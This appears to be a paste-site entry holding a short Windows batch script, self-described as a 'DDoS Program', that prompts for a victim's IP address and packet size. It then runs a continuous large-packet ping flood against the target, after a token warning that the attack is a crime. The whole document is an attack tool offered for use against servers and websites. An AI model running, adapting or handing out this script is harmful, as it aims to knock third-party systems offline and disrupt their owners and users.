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a guest
May 28th, 2015
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text 0.65 KB | None | 0 0
  1. @echo off
  2. color a
  3. title DDoS Program by Kryptiks
  4. cls
  5. goto start
  6. :start
  7. echo DDoS Program by _Kryptiks
  8. Pause
  9. echo Getting files
  10. ping localhost >nul
  11. echo Starting attack...
  12. echo.
  13. echo Enter victims IP Adress (This includes a server as well as a website)
  14. set /p x= Victims IP:
  15. echo Testing if IP is up...
  16. echo.
  17. ping %x%
  18. goto size
  19. :size
  20. echo Enter Packet Size (recommended 1000-4000 packets)
  21. set /p p=PacketSize:
  22. Pause
  23. goto :ddos
  24. color c
  25. :ddos
  26. echo Are you sure you want to take town %x%? This can result in arrestment, it is a crime.
  27. PAUSE
  28. echo If you do not want to exit out now
  29. PAUSE
  30. echo Starting attack
  31. color 4
  32. ping %x% -t -l %p%
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